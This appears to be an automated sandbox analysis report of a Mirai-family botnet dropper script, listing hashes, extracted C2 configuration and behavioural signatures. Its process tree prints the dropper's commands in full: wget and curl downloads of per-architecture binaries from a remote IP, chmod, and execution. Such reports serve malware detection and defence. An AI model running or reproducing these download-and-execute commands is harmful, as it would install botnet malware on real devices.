Analysis
-
max time kernel
137s -
max time network
139s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
03-11-2024 03:52
Static task
static1
Behavioral task
behavioral1
Sample
ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh
-
Size
2KB
-
MD5
e4e77af4bac19bf01d29278bd0e9e586
-
SHA1
c196bf5f34ff7ea2153847184efb61e1660a156b
-
SHA256
ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b
-
SHA512
84b295fee8cd431551221eaf5bb3148d58c5e58fce7a824bd30b0f6debff6cb10443518167a61eb4e06ee3802b0c476a8c464c8481f38fa4cd1208566adbb10e
Malware Config
Extracted
mirai
UNSTABLE
server.myway-ing.win
Extracted
mirai
UNSTABLE
Extracted
mirai
UNSTABLE
server.myway-ing.win
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 754 chmod 769 chmod 816 chmod 823 chmod 829 chmod 885 chmod 891 chmod 740 chmod 747 chmod 792 chmod 847 chmod 874 chmod 880 chmod -
Deletes itself 1 IoCs
Processes:
WTHpid process 748 WTH -
Executes dropped EXE 13 IoCs
Processes:
WTHWTHWTHWTHWTHWTHWTHWTHWTHWTHWTHWTHWTHioc pid process /tmp/WTH 741 WTH /tmp/WTH 748 WTH /tmp/WTH 755 WTH /tmp/WTH 771 WTH /tmp/WTH 793 WTH /tmp/WTH 818 WTH /tmp/WTH 824 WTH /tmp/WTH 830 WTH /tmp/WTH 849 WTH /tmp/WTH 875 WTH /tmp/WTH 881 WTH /tmp/WTH 886 WTH /tmp/WTH 892 WTH -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
Processes:
WTHdescription ioc process File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH -
Writes file to system bin folder 2 IoCs
Processes:
WTHdescription ioc process File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH -
Changes its process name 1 IoCs
Processes:
WTHdescription ioc pid process Changes the process name, possibly in an attempt to hide itself bblkt15nrr0l 748 WTH -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetcurlcatWTHpid process 743 wget 745 curl 746 cat 748 WTH -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlwgetcurlcurlwgetcurlcurlca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.shcurlcurlcurlwgetwgetwgetwgetwgetcurlcurlwgetcurlwgetwgetwgetcurldescription ioc process File opened for modification /tmp/zmap.i686 curl File opened for modification /tmp/zmap.mips curl File opened for modification /tmp/zmap.arm wget File opened for modification /tmp/zmap.arm5 curl File opened for modification /tmp/zmap.spc curl File opened for modification /tmp/zmap.m68k wget File opened for modification /tmp/zmap.sh4 curl File opened for modification /tmp/zmap.x86 curl File opened for modification /tmp/WTH ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh File opened for modification /tmp/zmap.mpsl curl File opened for modification /tmp/zmap.arm curl File opened for modification /tmp/zmap.arm7 curl File opened for modification /tmp/zmap.ppc wget File opened for modification /tmp/zmap.sh4 wget File opened for modification /tmp/zmap.x86 wget File opened for modification /tmp/zmap.mips wget File opened for modification /tmp/zmap.arm6 wget File opened for modification /tmp/zmap.arm6 curl File opened for modification /tmp/zmap.m68k curl File opened for modification /tmp/zmap.spc wget File opened for modification /tmp/zmap.arc curl File opened for modification /tmp/zmap.mpsl wget File opened for modification /tmp/zmap.arm5 wget File opened for modification /tmp/zmap.arm7 wget File opened for modification /tmp/zmap.ppc curl
Processes
-
/tmp/ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh/tmp/ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh1⤵
- Writes file to tmp directory
PID:711 -
/usr/bin/wgetwget http://154.216.16.38/zmap.x862⤵
- Writes file to tmp directory
PID:714
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/catcat zmap.x862⤵PID:739
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Lnj0jp WTH zmap.x862⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/WTH./WTH ssh.x862⤵
- Executes dropped EXE
PID:741
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:743
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/catcat zmap.mips2⤵
- System Network Configuration Discovery
PID:746
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Lnj0jp WTH zmap.mips zmap.x862⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/WTH./WTH ssh.mips2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
- System Network Configuration Discovery
PID:748
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.mpsl2⤵
- Writes file to tmp directory
PID:751
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/catcat zmap.mpsl2⤵PID:753
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Lnj0jp WTH zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/WTH./WTH ssh.mpsl2⤵
- Executes dropped EXE
PID:755
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.arm2⤵
- Writes file to tmp directory
PID:757
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/catcat zmap.arm2⤵PID:768
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Lnj0jp WTH zmap.arm zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/WTH./WTH ssh.arm2⤵
- Executes dropped EXE
PID:771
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.arm52⤵
- Writes file to tmp directory
PID:774
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/catcat zmap.arm52⤵PID:790
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Lnj0jp WTH zmap.arm zmap.arm5 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/WTH./WTH ssh.arm52⤵
- Executes dropped EXE
PID:793
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.arm62⤵
- Writes file to tmp directory
PID:797
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/catcat zmap.arm62⤵PID:815
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Lnj0jp WTH zmap.arm zmap.arm5 zmap.arm6 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/WTH./WTH ssh.arm62⤵
- Executes dropped EXE
PID:818
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.arm72⤵
- Writes file to tmp directory
PID:820
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/catcat zmap.arm72⤵PID:822
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Lnj0jp WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/WTH./WTH ssh.arm72⤵
- Executes dropped EXE
PID:824
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.ppc2⤵
- Writes file to tmp directory
PID:826
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/catcat zmap.ppc2⤵PID:828
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Lnj0jp WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/WTH./WTH ssh.ppc2⤵
- Executes dropped EXE
PID:830
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.m68k2⤵
- Writes file to tmp directory
PID:832
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:838
-
-
/bin/catcat zmap.m68k2⤵PID:846
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Lnj0jp WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/WTH./WTH ssh.m68k2⤵
- Executes dropped EXE
PID:849
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.spc2⤵
- Writes file to tmp directory
PID:855
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/catcat zmap.spc2⤵PID:873
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/WTH./WTH ssh.spc2⤵
- Executes dropped EXE
PID:875
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.i6862⤵PID:877
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/catcat zmap.i6862⤵PID:879
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/WTH./WTH ssh.i6862⤵
- Executes dropped EXE
PID:881
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.sh42⤵
- Writes file to tmp directory
PID:882
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/catcat zmap.sh42⤵PID:884
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/WTH./WTH ssh.sh42⤵
- Executes dropped EXE
PID:886
-
-
/usr/bin/wgetwget http://154.216.16.38/zmap.arc2⤵PID:888
-
-
/usr/bin/curlcurl -O http://154.216.16.38/zmap.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/catcat zmap.arc2⤵PID:890
-
-
/bin/chmodchmod +x ca57064d873efe0819caf6a2b16b0e57ffb7b97401929cdde83b62de9cf45e7b.sh WTH zmap.arc zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/WTH./WTH ssh.arc2⤵
- Executes dropped EXE
PID:892
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
94KB
MD5192b6eb8dcf1ad172064c832fbb47b92
SHA1a2af8812f96d0748f3a119a4419ff65dcffb179c
SHA256a97f5317845c7053e64d0d8d5e076532de7a2c98189eb7304b8e0e742e61e93d
SHA5127ad2efc28832cf1312c00bccf6866669938b0f4787999b7112f750377aa5582b8c508bedba29f482dadceb6a1c3868ce87220cdded44399a1cd325ab9bfd7e9a
-
Filesize
94KB
MD5b4458e4fa2efcf88bfa2aaeda864519e
SHA18263798736379ed4ce23ef75e4d1f606e05c815b
SHA256146ef07d918f77546ba8112e9f307361f9d54af4886dba7fc4ba9e58bc8c5d47
SHA5124aa6068f6e3ed09c6706c37f046cd4081a5c7de3e307860e67ff9fff426a281f33dbb027bbcb36b0fd9df6dccd083308d78f43948009ccdcc3676ed4ff063010
-
Filesize
74KB
MD58a666a51d2aeb8e106c7c9a302aa3acb
SHA1c222cd4760966db8f2461c4dc034f9f3fe912eb2
SHA2567b6c76af31adf965e62b5c726ea382825eb5f2aefc7e7331b192e0d4c809fe46
SHA512b48dd376f4e801bd6ea3351a1726a45d1b895f25f534d9d211b1023195881211f3b52f02914317899f122d71b88775e912f6092e5fe7d83565b3fd23012a04ac
-
Filesize
49KB
MD5803219db4e5384144e86c388e558a530
SHA1c8cb8ec327c2a53a6a5fa42d8c2886161defff89
SHA2560edc353b0bc96801a0a2d654427c9f51991f3500a3a43070d9c5828efadd352e
SHA512ccc7ee4ea8f672dd7d8df15e809b6cd9250ec80c0edbd929f0f8ab794c07bcf6ca7aade1f47898348b999f729b1ed6b47d4abed73eb8d2c94eac023fd5cf6332
-
Filesize
152KB
MD504bd1585a8ca785193b158d27307e80b
SHA120faf0e3c7f878f134142f71c9f5b7d58ce5ab17
SHA256272f6e7e0d6dd601ef8110959bc6907cf4531a87fc3e6a5b3ab7d32d1fa3d2ee
SHA512d92b33a37dbd627faaf48ed65f785191ea8fccb104e15801d64160885e6244a7a98bc17ae1a5eb9e0c9d7f4b5f807174c2aff30d7235be4e8a19b271cd1fc2f2
-
Filesize
61KB
MD58edb75406d233f4201e85fd2d746c114
SHA179272fc7bf16c8f354efa0b4b59bcdf0f929fa0a
SHA256e1f60f41d27140942ad74ef1f1bae26fc98787fed03c91d3c4a33e5390b6d3be
SHA512df424a671363b4a9d6480a3210e9b135dfbce80bb9e8af7f2b931c5ba51deb8256d54b505dd418091f03c4139ccec955cc00cfeb1456e791c37d7abb5a1253c5